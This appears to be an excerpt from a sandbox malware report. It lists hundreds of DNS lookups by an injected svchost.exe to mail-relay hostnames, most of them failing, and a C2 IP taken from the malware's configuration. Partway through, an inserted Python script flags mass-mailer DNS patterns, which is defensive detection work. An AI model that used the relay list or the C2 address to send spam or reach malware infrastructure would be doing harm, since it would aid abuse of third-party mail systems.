                      Source: C:\Windows\System32\svchost.exeDomain query: emf.eei.uni-erlangen.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.websitebod.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.agrotipp.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: mstevens.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.rockfiend.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sccoast.net
                      Source: C:\Windows\System32\svchost.exeDomain query: tiscali.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: tluh.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.ranuccy.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.helanta.sh
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.clubinternet.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.giochi0.it
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx4.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dynamicpayoff.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i-dear2.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.servicioscorporativos.mx
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cardnet.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.elhassociates.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.hexatech.com.my
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.frontier.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.gelsennet.de
                      Source: C:\Windows\System32\svchost.exeDomain query: muum.com.tr
                      Source: C:\Windows\System32\svchost.exeDomain query: chrislittell.com
                      Source: C:\Windows\System32\svchost.exeDomain query: augustakom.net
                      Source: C:\Windows\System32\svchost.exeDomain query: vera.com.uy
                      Source: C:\Windows\System32\svchost.exeDomain query: out.lollygaggeru.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.convertor-3gp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: pec.it
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sps-co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.paris-ag.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.xtremexcavation.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.capaci.de
                      Source: C:\Windows\System32\svchost.exeDomain query: docomo.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.mpost.co.nz
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.marley.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.southeastrec.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.frigus.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.windstream.net
                      Source: C:\Windows\System32\svchost.exeDomain query: sunrise.ch
                      Source: C:\Windows\System32\svchost.exeDomain query: dvc.vn
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.marginalis.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.tmd-tunelmuhendisligi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bpmconsultants.in
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clements1975.fslife.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: spektrum.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.grupo-neo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.aueb.gr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.generic-isp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.i.ua
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theploughinn.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ms-scorpio.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.exois.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tamkinhochberg.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.moenchs-waldhotel.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.apotecbay.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2c28.carrierzone.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.e-olympics.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.selfcateringinknysna.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.oita.jtuc-rengo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: cloud15.spamtitan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.techsolutionscanada.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.mairie-habsheim.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.ding.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ceti.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.rlmorgan.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.allianceinsurance.in
                      Source: C:\Windows\System32\svchost.exeDomain query: bhs-is.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: interia.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casadociclista.net.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.pflege.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.jcom.home.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: heidester.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hughes.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.fivefigureweeks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gemicomp.com.ar
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.firstfriends.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.inwind.it
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clayton.k.ga.us
                      Source: C:\Windows\System32\svchost.exeDomain query: out.web-schaaf.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.laser.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: vermesser.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gammu.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.credibo.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.abcnetworkingu.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.testroamright.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.pinnaclesettlements.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lykal.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mandres.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.lebcedars.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.bleisetzer.de
                      Source: C:\Windows\System32\svchost.exeDomain query: dzv-netz.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.arenaholidays.net
                      Source: C:\Windows\System32\svchost.exeDomain query: lfsvechta.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.gfgfgf.org
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bindifencing.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ldbcargas.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: laudioikastola.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.etica.conc-bmw.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netines.net
                      Source: C:\Windows\System32\svchost.exeDomain query: womenjapan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp-01.tld.t-online.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgin.net
                      Source: C:\Windows\System32\svchost.exeDomain query: kefgames.net
                      Source: C:\Windows\System32\svchost.exeDomain query: digcom-ca.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.fkksol.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.csgs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.saluscm.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.grafikdev.com
                      Source: C:\Windows\System32\svchost.exeDomain query: autograf.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.milaus.net
                      Source: C:\Windows\System32\svchost.exeDomain query: ms5.ncv.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.xplornet.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hif.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theoxfordhotel.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centurylink.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aqua.daa.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.bysources.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.lcampino.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ucr.ac.cr
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.fluid.demon.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.skidfamily.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hotmy.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.irvineproject.cn
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.desomniac.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx0.uniserve.com
                      Source: C:\Windows\System32\svchost.exeDomain query: noos.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.adephia.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.q.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cefnogi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cssd.org
                      Source: C:\Windows\System32\svchost.exeDomain query: hofmann-geraberg.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ig.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.begames.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.atlanticbb.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.y4hoo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lengau.info.bw
                      Source: C:\Windows\System32\svchost.exeDomain query: mx3.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.barbassa.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.avis.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rostele.com
                      Source: C:\Windows\System32\svchost.exeDomain query: numeo.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: oapv.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: constelacionesmadrid.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ezweb.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casscomm.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.shortlinesales.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.citromail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.framgangsrikaforetag.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oldenglishchurch.org.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.wtqudu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tecdev.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.americanaugers.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: ozonekayak-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx-1.dpoczta.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.mchscares.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.tempcloud.info
                      Source: C:\Windows\System32\svchost.exeDomain query: grafmueller-schuhe.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dolores.art.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.venter.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.com
                      Source: C:\Windows\System32\svchost.exeDomain query: viha.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.therightweigh.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optonline.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ivan-elkin.name
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.vanwoerdekom.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.eclplastics.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.multicopia360.com
                      Source: C:\Windows\System32\svchost.exeDomain query: telefonica.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.internet.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: d178078a.ess.barracudanetworks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: in4.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: airrivals.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: gruesshaber.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2.321.com
                      Source: C:\Windows\System32\svchost.exeDomain query: tvsnaples.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.polar-transport.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mjbelda.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.cotamicro.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: wss-docs.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.integrapost.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.atlanticexpress.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.futterplatzerl.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hacked.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.limpec.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: out.shop-e-nfinite.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hightelecom.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i.softbank.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: btconnect.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bresnan.net
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mamasimon.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.freemail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: hooter.com
                      Source: C:\Windows\System32\svchost.exeDomain query: imsinc01.filter2.lastspam.com
                      Source: C:\Windows\System32\svchost.exeDomain query: softbank.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: virtualworkforcepro.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sputtr.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.emarki.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.milenio.com
                      Source: C:\Windows\System32\svchost.exeDomain query: 94c8b50eb70aa4c8.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cajememotors.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx1.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx2.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: bulkeley.navy.mil
                      Source: C:\Windows\System32\svchost.exeDomain query: dominy.f9.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.apollosouth.com
                      Source: C:\Windows\System32\svchost.exeDomain query: proxmea.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.uchisyakyo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rapeli.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.stein-druck.de
                      Source: C:\Windows\System32\svchost.exeDomain query: test789.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oaktreefinancial.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: fsmail.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.sayclub.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.brpindustries.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: mx37.mb5p.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.univers-actu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.pacnet.netau
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ziggo.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: blakehurst.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.postmaster.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: loens.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.forfas.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.antasinsaat.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.muenzen-becker.de
                      Source: C:\Windows\System32\svchost.exeDomain query: laga.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgilio.it
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.scoilmhuirelongford.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.market-wave.link
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.2cr-h.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.nexgo.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.marin.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: relay.upm.es
                      Source: C:\Windows\System32\svchost.exeDomain query: out.horizon-xl.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.elitter.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx.l.google.com
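The svchost.exe query list above is the evidence behind the report's "Tries to resolve many domain names, but no domain seems valid" and "Send many emails (e-Mail Spam)" signatures: a system process that normally resolves only Microsoft infrastructure is walking through hundreds of relay-looking hostnames (smtp., securesmtp., secure., mail., mx., out., aspmx) and most of them come back NXDOMAIN, which is what an injected spam module looks like when it works from a stale relay list. As an added example that is not part of the Joe Sandbox report or its tooling, the following Python scores rows in the report's own row layout with that heuristic. The svchost.exe rows in the sample are copied from the report above; the firefox.exe rows are constructed as a benign control, and the relay-stem list and the thresholds are the author's assumptions, not anything the sandbox uses.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Row layouts as they appear in the Joe Sandbox report. The patterns also
# accept the raw export's fused "svchost.exeDomain query:" and "replaycode".
QUERY_RE = re.compile(r"Source:\s*(?P<proc>.+?)\s*Domain query:\s*(?P<name>\S+)")
REPLY_RE = re.compile(
    r"DNS traffic detected: query:\s*(?P<name>\S+)\s*repl(?:ay|y) ?code:\s*"
    r"(?P<text>.+?)\s*\((?P<rcode>\d+)\)"
)

# First-label stems the spam module uses when guessing a victim's outbound
# relay, taken from the hostnames in the report. Assumption: this list and the
# thresholds in analyze() are the author's heuristic, not a sandbox rule.
MAIL_RELAY_STEMS = {"smtp", "smtpin", "securesmtp", "secure", "mail", "mx",
                    "out", "relay", "aspmx"}


def is_mail_relay_name(name: str) -> bool:
    """True when the first DNS label looks like a mail relay or MX host."""
    first = name.lower().split(".")[0]
    stem = re.sub(r"[-\d].*$", "", first)   # mx3 -> mx, smtp-01 -> smtp
    return stem in MAIL_RELAY_STEMS


@dataclass
class DnsVerdict:
    process: str
    queries: int      # distinct names the process resolved
    mail_like: int    # of which looked like mail relays
    nxdomain: int     # of which came back with a non-zero DNS reply code
    suspicious: bool


def analyze(lines, min_queries=10, mail_ratio=0.6, fail_ratio=0.5):
    """Group 'Domain query' rows by process, then join them by hostname to the
    'DNS traffic detected' rows, which carry no process (Source: unknown)."""
    per_proc = defaultdict(set)
    failed = set()
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            per_proc[m.group("proc")].add(m.group("name").lower())
            continue
        m = REPLY_RE.search(line)
        if m and m.group("rcode") != "0":      # NXDOMAIN (3), SERVFAIL (2), ...
            failed.add(m.group("name").lower())
    verdicts = {}
    for proc, names in per_proc.items():
        total = len(names)
        mail_like = sum(is_mail_relay_name(n) for n in names)
        nx = sum(n in failed for n in names)
        suspicious = (total >= min_queries
                      and mail_like / total >= mail_ratio
                      and nx / total >= fail_ratio)
        verdicts[proc] = DnsVerdict(proc, total, mail_like, nx, suspicious)
    return verdicts


def flagged(lines, **thresholds):
    """Process paths whose DNS behaviour matches the mass-mailer pattern."""
    return sorted(p for p, v in analyze(lines, **thresholds).items() if v.suspicious)


# Sample rows: the svchost.exe and reply-code rows are copied from the report;
# the firefox.exe rows are constructed here as a benign control.
SAMPLE_ROWS = [
    r"Source: C:\Windows\System32\svchost.exe Domain query: out.mytrixtech.com",
    r"Source: C:\Windows\System32\svchost.exe Domain query: smtp.lachambre.be",
    r"Source: C:\Windows\System32\svchost.exe Domain query: securesmtp.fada.co.jp",
    r"Source: C:\Windows\System32\svchost.exe Domain query: smtp.bwana.org",
    r"Source: C:\Windows\System32\svchost.exe Domain query: mail.xtremexcavation.ca",
    r"Source: C:\Windows\System32\svchost.exe Domain query: out.gammu.de",
    r"Source: C:\Windows\System32\svchost.exe Domain query: smtp.sps-co.jp",
    r"Source: C:\Windows\System32\svchost.exe Domain query: secure.elitter.net",
    r"Source: C:\Windows\System32\svchost.exe Domain query: securesmtp.ding.com",
    r"Source: C:\Windows\System32\svchost.exe Domain query: smtp.cardnet.co.jp",
    r"Source: C:\Windows\System32\svchost.exe Domain query: aspmx.l.google.com",
    r"Source: C:\Windows\System32\svchost.exe Domain query: mx3.ovh.net",
    r"Source: C:\Program Files\Mozilla Firefox\firefox.exe Domain query: www.mozilla.org",
    r"Source: C:\Program Files\Mozilla Firefox\firefox.exe Domain query: detectportal.firefox.com",
    "Source: unknown DNS traffic detected: query: out.mytrixtech.com reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: smtp.lachambre.be reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: securesmtp.fada.co.jp reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: smtp.bwana.org reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: mail.xtremexcavation.ca reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: out.gammu.de reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: smtp.sps-co.jp reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: secure.elitter.net reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: securesmtp.ding.com reply code: Name error (3)",
    "Source: unknown DNS traffic detected: query: smtp.cardnet.co.jp reply code: Name error (3)",
]

if __name__ == "__main__":
    for v in analyze(SAMPLE_ROWS).values():
        print(v)
    print("flagged:", flagged(SAMPLE_ROWS))
```

Joining on hostname rather than process is forced by the report layout: the reply-code rows have no source process, so a name that several processes queried counts against each of them. On a real host the same logic runs over Sysmon Event ID 22 or resolver logs, where the process is present in both records and the join is unnecessary; the thresholds then need raising, since this sample issues hundreds of lookups, not twelve.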
                      Source: Malware configuration extractorURLs: 212.162.153.199
                      Source: unknown DNS traffic detected: query: out.gammu.de reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.testroamright.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.muenzen-becker.de reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.scoilmhuirelongford.ie reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.horizon-xl.de reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: test789.fr reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.avis.cl reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: mail.xtremexcavation.ca reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.therightweigh.co.uk reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.acetec.es reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.oita.jtuc-rengo.jp reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.shortlinesales.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.framgangsrikaforetag.se reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.mandres.de reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.market-wave.link reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.hexatech.com.my reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: constelacionesmadrid.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.mairie-habsheim.de reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.rsaweb.co.za reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.cardnet.co.jp reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.thegreataunties.co.uk reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.lachambre.be reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.rapeli.de reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: ghuitf.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.csgs.com reply code: Server failure (2)
                      Source: unknown DNS traffic detected: query: securesmtp.mjbelda.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.hyacinthhouse.se reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: mail.americanaugers.jp reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: mail.venter.com.br reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.irvineproject.cn reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.bindifencing.com.au reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.elhassociates.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: naoansiedade.com.br reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.limpec.com.br reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.bwana.org reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.mchscares.org reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.hightelecom.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.grafikdev.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.theoxfordhotel.com.au reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.wtqudu.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: chrislittell.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.oaktreefinancial.ca reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.clayton.k.ga.us reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.fada.co.jp reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.host-41-196-190-143.static.link.com.eg reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.elitter.net reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.ding.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.sonar.co.hu reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.jmichaelvinson.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.teccart.online reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.atlanticexpress.ca reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.strath.ac.uk reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.pacnet.netau reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: securesmtp.piramitgroup.org reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.tmd-tunelmuhendisligi.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.selfcateringinknysna.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.caso.es reply code: Server failure (2)
                      Source: unknown DNS traffic detected: query: out.multicopia360.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: out.mytrixtech.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.irvinhomesfl.com reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: secure.allianceinsurance.in reply code: Name error (3)
                      Source: unknown DNS traffic detected: query: smtp.sps-co.jp reply code: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.robbievox.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.hereiam.plus.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.exois.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: lfsvechta.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.apotecbay.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.uniquedestinationsllc.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: smtp.southeastrec.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.opsofis.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.mamasimon.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: newday-technology.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.zgm.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.eclplastics.co.uk replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.clements1975.fslife.co.uk replaycode: Server failure (2)
                      Source: unknownDNS traffic detected: query: smtp.etica.conc-bmw.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.ddfs.dsf replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.dolores.art.br replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: securesmtp.acicapital.com replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: out.arenaholidays.net replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: mail.ezz.de replaycode: Name error (3)
                      Source: unknownDNS traffic detected: query: secure.milaus.net replaycode: Name error (3)
